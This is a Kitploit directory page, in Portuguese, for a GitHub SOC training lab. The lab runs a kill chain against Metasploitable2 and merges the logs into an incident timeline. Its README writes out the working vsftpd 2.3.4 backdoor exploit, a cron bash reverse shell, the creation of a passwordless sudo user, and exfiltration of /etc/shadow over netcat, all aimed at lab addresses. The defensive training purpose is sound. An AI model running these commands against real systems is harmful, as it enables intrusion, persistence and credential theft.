Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
soc-investigation-lab — Investigação SOC ponta a ponta: kill chain CVE-2011-2523, correlação de logs de múltiplas fontes, relatório de incidente — MITRE ATT&CK T1190 | Kitploit
Ferramentas/GitHubGitHub/mithileshan/soc-investigation-lab
ReconhecimentoAnálise de VulnerabilidadesExploraçãoAnálise ForensePós-ExploraçãoTestes de PenetraçãoInteligência de AmeaçasAprendizado e EducaçãoResposta a Incidentes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Análise de Logs
Labs e Prática
GitHubmithileshan/soc-investigation-lab

soc-investigation-lab

Investigação SOC ponta a ponta: kill chain CVE-2011-2523, correlação de logs de múltiplas fontes, relatório de incidente — MITRE ATT&CK T1190

Ver Repositório
15há 5 mesesAinda não revisado
Compartilhar

Laboratório de Investigação SOC Completo

Executa uma cadeia de ataque completa de quatro fases (Reconhecimento → Exploração → Persistência → Exfiltração) contra o Metasploitable2, coleta evidências em cada fase e produz uma linha do tempo estruturada do incidente e um relatório SOC — demonstrando simultaneamente o pensamento do atacante e do defensor.

MITRE ATT&CK T1190 MITRE ATT&CK T1136 MITRE ATT&CK T1078 MITRE ATT&CK T1041 Python


Objetivo

Este é o projeto de conclusão. Demonstra a capacidade de:

  • Executar uma kill chain realista contra um alvo deliberadamente vulnerável
  • Coletar evidências forenses em cada estágio usando múltiplas fontes de telemetria
  • Correlacionar entradas de log de sistemas distintos em uma linha do tempo unificada do incidente
  • Realizar uma análise de lacuna de visibilidade — identificando o que teria sido perdido sem a cobertura de detecção adequada
  • Produzir um relatório de incidente de nível SOC no formato usado por equipes de segurança reais

O exploit utilizado (CVE-2011-2523 — backdoor vsftpd 2.3.4) é historicamente significativo: foi um ataque à cadeia de suprimentos onde um adversário injetou um backdoor no repositório de código-fonte do pacote vsftpd open-source.


Arquitetura

                    ╔═══════════════════════════════╗
                    ║  soc-lab (172.23.0.0/24)       ║
                    ║                               ║
┌─────────────┐     ║  ┌─────────────────────────┐  ║
│  Atacante   │     ║  │  Metasploitable2        │  ║
│  Kali Linux │     ║  │  172.23.0.200           │  ║
│             │     ║  │                         │  ║
│  Fase 1     │─────╫─►│  :21  vsftpd 2.3.4 ◄───╫──╫── CVE-2011-2523
│  nmap -A    │     ║  │  :22  SSH               │  ║    backdoor on :6200
│             │     ║  │  :80  HTTP (DVWA)        │  ║
│  Fase 2     │─────╫─►│  :445 Samba             │  ║
│  msf exploit│◄────╫──│  :6200 root shell       │  ║
│             │     ║  └─────────────────────────┘  ║
│  Fase 3     │─────╫─► useradd sysbackup           ║
│  persistência│─────╫─► crontab reverse shell       ║
│             │     ║                               ║
│  Fase 4     │◄────╫── /etc/shadow via nc :5555    ║
│  exfiltração     ╚═══════════════════════════════╝
└──────┬──────┘
       │
       │ Coleta de evidências:
       │  logs/msf_session.log
       │  logs/target_auth.log
       │  captures/full_attack_chain.pcap (tshark CSV)
       ▼
┌──────────────────────────────────────────────────┐
│  build_timeline.py                               │
│  Analisador: log MSF + auth.log + tshark CSV     │
│  → mesclar por timestamp → marcar por fase        │
│  → JSON da linha do tempo + relatório Markdown    │
└──────────────────────────────────────────────────┘

Ferramentas & Stack

FerramentaPropósito
Metasploitable2Alvo Linux deliberadamente vulnerável
Nmap 7.94Fase 1: Enumeração de serviços
Metasploit 6.xFase 2: Exploit vsftpd 2.3.4
NetcatFase 3–4: Persistência + exfiltração
tsharkCaptura de pacotes em todas as fases
Python 3build_timeline.py — mesclador de logs de múltiplas fontes
Splunk Free / ELKDetecção SIEM por fase

Configuração

cd docker/

# Iniciar Metasploitable2 (rede isolada)
docker compose up -d metasploitable

# Verificar se o alvo está acessível
nmap -p 21,22,80 172.23.0.200

# Iniciar captura de pacotes em segundo plano
sudo tcpdump -i eth0 host 172.23.0.200 \
    -w captures/full_attack_chain.pcap &

Como Executar (Cadeia de Ataque)

Fase 1 — Reconhecimento

nmap -sV -O -A \
    -p 21,22,80,139,445,3306,5432 \
    --script=banner,ftp-anon,http-title \
    -oX logs/recon_scan.xml \
    172.23.0.200

Descoberta chave: 21/tcp open ftp vsftpd 2.3.4

Fase 2 — Exploração (CVE-2011-2523)

# Método A: Metasploit
msfconsole -q -x "
  use exploit/unix/ftp/vsftpd_234_backdoor;
  set RHOSTS 172.23.0.200;
  set PAYLOAD cmd/unix/interact;
  run" | tee logs/msf_session.log

# Método B: Manual (demonstra o mecanismo)
# Passo 1: Acionar o backdoor enviando nome de usuário com ':)'
printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
# Passo 2: Conectar ao shell root gerado
nc 172.23.0.200 6200
# → id: uid=0(root) gid=0(root)

Por que funciona: Quando o vsftpd 2.3.4 recebe um nome de usuário contendo a substring :), o daemon executa execl("/bin/sh",...) vinculado à porta TCP 6200. Nenhuma autenticação necessária — shell root direto.

Fase 3 — Persistência

# Executar no shell root no alvo:
useradd -m -s /bin/bash sysbackup
echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -

Fase 4 — Exfiltração

# Receptor (atacante)
nc -lvnp 5555 > samples/exfiltrated_shadow.txt

# Remetente (no alvo)
cat /etc/shadow | nc 172.23.0.1 5555

Construir a linha do tempo do incidente

# Converter PCAP para CSV primeiro
bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap

# Construir linha do tempo de todas as fontes
python3 src/build_timeline.py \
    --msf-log  logs/msf_session.log \
    --auth-log logs/target_auth.log \
    --pcap-csv captures/full_attack_chain_packets.csv \
    --output-json samples/timeline.json \
    --output-md   docs/incident_report.md \
    --pretty

Exemplo de Saída

build_timeline.py stderr

2026-04-24T16:05:20  [INFO    ]  Parsed 9 events from MSF log
2026-04-24T16:05:20  [INFO    ]  Parsed 11 events from auth.log
2026-04-24T16:05:20  [INFO    ]  Parsed 4 flow-initiation events from PCAP CSV
2026-04-24T16:05:20  [INFO    ]  Total events (sorted): 24
2026-04-24T16:05:20  [INFO    ]  Unique IOCs extracted: 4
2026-04-24T16:05:20  [INFO    ]  Phase RECON   : 8 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXPLOIT : 4 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase PERSIST : 6 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXFIL   : 2 event(s)

Linha do tempo do incidente (excerto de samples/sample_timeline.json)

{
  "total_events": 24,
  "iocs": [
    { "indicator": "172.23.0.1", "phase": "RECON",   "occurrence": 8 },
    { "indicator": "172.23.0.1", "phase": "EXPLOIT",  "occurrence": 2 },
    { "indicator": "sysbackup",  "phase": "PERSIST", "occurrence": 1 }
  ],
  "timeline": [
    { "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON",   "description": "nmap -sV -O -A", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "session 1 opened (172.23.0.1 → 172.23.0.200)", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: new user: name=sysbackup", "source": "auth_log" },
    { "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL",   "description": "flow 172.23.0.200 → 172.23.0.1:5555", "source": "pcap" }
  ]
}

Análise de Lacuna de Visibilidade

Esta é a saída analítica mais importante — o que teria sido perdido sem a detecção adequada.

Baixar ferramenta